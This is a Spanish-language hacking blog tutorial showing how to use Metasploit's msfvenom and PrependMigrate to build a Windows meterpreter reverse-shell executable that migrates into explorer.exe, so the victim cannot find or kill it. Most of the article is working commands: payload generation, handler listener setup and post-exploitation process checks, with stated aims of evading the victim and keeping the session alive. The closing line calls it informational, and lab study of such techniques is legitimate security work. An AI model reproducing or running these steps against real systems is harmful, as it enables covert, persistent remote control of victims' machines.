Hacking Window s Payload Metasploit y PrependMigrate
Hacking Window s Payload Metasploit y PrependMigrate
Junior Geeks·
Hacking y Pentesting
·6 Minutos de lectura

Metasploit: Ocultar Shell utilizando PrependMigrate

En este artículo, conocerás la fuerza de mfsvenom junto con PrependMigrate. También aprenderás cómo migrar el payload a los procesos que se ejecutan actualmente en la máquina de destino para que así la víctima no pueda encontrar el archivo malicioso.

Es muy importante migrar tu backdoor payload porque si el objetivo es alertado y decide tomar medidas para matar el proceso, tu sesión también será ‘matada‘. Por lo tanto, un atacante debe hacer esto tan pronto como se abra la sesión.

Tabla de Contenido

1. Terminologías Básicas

1.1. Metasploit Framework

Metasploit Framework, una herramienta de código abierto para desarrollar y ejecutar código de exploit contra una máquina de destino remota.

Los pasos para explotar un sistema usando el Framework incluyen:

  1. Elegir y configurar un exploit
  2. Comprobar si el sistema objetivo previsto es susceptible al exploit elegido
  3. Elegir y configurar una payload
  4. Elegir la técnica de encoding
  5. Ejecutar el exploit.

Este enfoque modular, que permite la combinación de cualquier exploit con cualquier payload, es la principal ventaja de Framework. Facilita las tareas de los atacantes, los escritores de exploits y los escritores de payload.

1.2. Msfvenom

MSFvenom es una combinación de Msfpayload y Msfencode, que pone ambas herramientas en una sola instancia de Framework. Se utiliza para generar y codificar varios tipos de payload que están disponibles en Metasploit Framework. Las ventajas de msfvenom son:

  • Una sola herramienta
  • Opciones de línea de comandos estandarizadas
  • Mayor velocidad

1.3. PrependMigrate

PrependMigrate es una opción que nos permite vincular nuestra sesión con un proceso continuo en el sistema de destino. También puede transferir una sesión vinculándola de un proceso a otro. Resulta útil ya que es difícil para el objetivo/víctima encontrar el proceso malicioso, por lo que se vuelve fundamental para el atacante cubrir sus huellas.

Configuraciones utilizadas en este tutorial:

Atacante:

Objetivo:

  • SO: Windows 10
  • IP: 192.168.1.63

2. Método 1: Con MSFvenom

Comencemos el juego de ocultar y buscar. Tienes que esconderte para salvarte y dejar que el objetivo intente encontrarte.

Comenzando con MSFvenom, crearemos un ejecutable malicioso llamado esgeeks.exe y ocultaremos el ejecutable generado detrás de un proceso llamado explorer.exe (puedes elegir cualquier proceso que se ejecute en el administrador de tareas) mediante el proceso PrependMigrate.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.61 lport=1234 prpendmigrateprocess=explorer.exe prependmigrate=true -f exe > esgeeks.exe
MSFvenom para crear ejecutable malicioso
MSFvenom para crear ejecutable malicioso

A continuación, cargaremos el Metasploit framework en Parrot utilizando la palabra clave msfconsole.

Abrir msfconsole
Abrir msfconsole

Luego configura las siguientes opciones para habilitar nuestro handler:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.61
set lport 1234
exploit
Sesión meterpreter con payload
Sesión meterpreter con payload

Ahora, enviaremos la payload (archivo .exe) a la máquina de destino y ejecutaremos el ejecutable en la máquina de destino. Esto generará una sesión de meterpreter que será capturada por el oyente que creamos anteriormente.

[eckosc_status_message title=”Truco!” icon=”fa-info-circle” type=”warn” message=”Puedes acceder al sistema de destino, pero si el objetivo reconoce que el sistema está comprometido; entonces pueden tomar medidas de seguridad para finalizar tu sesión. Entonces…”]

Para escapar de esta situación, la primera responsabilidad del atacante es ocultar la payload ejecutable detrás de un proceso para que la víctima no pueda identificarlo de ninguna manera posible.

Use el siguiente comando ps para verificar los procesos que se están ejecutando actualmente y filtra con esgeeks.exe

ps | grep esgeeks.exe
Ocultar payload en un proceso
Ocultar payload en un proceso

El ID de proceso (PID) de esgeeks.exe es decir 5396 como se muestra en la lista de procesos (será diferente para tu caso) y si la víctima mata el esgeeks.exe es decir el PID 5396, entonces el proceso en ejecución finalizará. Por lo tanto, finalizamos nuestra sesión con un comando simple:

kill 5396

Pero no necesitas preocuparte ya que PrependMigrate ahorra el trabajo al permitirnos ocultar esgeeks.exe detrás del explorer.exe y tendrás una ventaja ya que tu sesión de meterpreter aún se está ejecutando. Incluso después de que el sistema se reinicie, el Meterpreter en el sistema de la víctima intenta conectarse con nosotros cada 5 segundos hasta que haya abierto una sesión para nosotros. Y puedes usar el comando sysinfo para confirmar que la sesión todavía está en funcionamiento.

3. Método 2: Sin MSFvenom

La segunda forma de ocultar shells usando PrependMigrate pero sin usar msfvenom. Aquí, el objetivo es el mismo que el anterior. Comenzaremos abriendo el Metasploit Framework.

Luego usa el siguiente conjunto de comandos para crear tu payload:

use windows/meterpreter/reverse_tcp
set lhost 192.168.1.61
set lport 4444
set prependmigrate true
set prependmigrateprocess explorer.exe
generate -f exe -o geek.exe
Crear payload con prependmigrate y Metasploit
Crear payload con prependmigrate y Metasploit

Después de la creación del ejecutable malicioso, es decir, geek.exe, crearemos un escucha/ multi/handler utilizando los siguientes comandos:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.61
set lport 4444
exploit
Crear metasploit payload reverse_tcp
Crear metasploit payload reverse_tcp

Usando el comando ps junto con el comando grep obtendremos el PID de geek.exe, por ejemplo 4152.

ps | grep geek.exe
Hackear Windows con Metasploit
Hackear Windows con Metasploit

[eckosc_status_message title=”Nota!” icon=”fa-info-circle” type=”info” message=”PID significa ID de Proceso, que significa el número de identificación para el proceso que se está ejecutando actualmente en la memoria. PPID significa Parent Process Id, lo que significa que el proceso primario es responsable de crear el proceso secundario (actual). Mediante el proceso primario, el secundario proceso será creado.”]

Ahora intentamos matar el proceso geek.exe para ocultar a la víctima con el siguiente comando:

kill 4152

Pero aún así, tienes una sesión de víctima, lo que significa que geek.exe migra al nuevo id de proceso de explorer.exe. Y puedes usar el comando sysinfo u otros comandos, para confirmar que la sesión todavía está en funcionamiento.

Comandos post explotación
Comandos post explotación

Así es como un hacker se oculta. El propósito de este artículo es servir de información, ya que uno debe saber cómo ubicar y eliminar al atacante, así como cómo esconderse cuando estás al otro lado de la línea.

Algunas recomendaciones extras:

¿Te ha gustado este artículo? Sigue este blog en su fanpage de  FacebookTwitterInstagram y/o YouTube para que no te pierdas del mejor contenido informático y hacking!

Etiquetas
1 2 3 1

🤞 ¡El Gran Hermano te vigila, pero sabemos cómo detenerlo!

¡No enviamos spam! Lee nuestra Política de Privacidad para más información.

Junior Geeks
Junior Geeks es un colectivo de profesionales de la ciberseguridad y hacking ético con certificaciones de élite como OSCP (Offensive Security Certified Professional) y CEH (Certified Ethical Hacker).Nuestra misión en esgeeks.com es democratizar el conocimiento, proporcionando trucos y guías prácticas sobre sistemas operativos, seguridad y el mundo digital en general. Con más de una década combinada de experiencia, nuestro objetivo es darte las herramientas para que tú tengas el control.
Relacionado

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.

Mi Carro Close (×)

Tu carrito está vacío
Ver tienda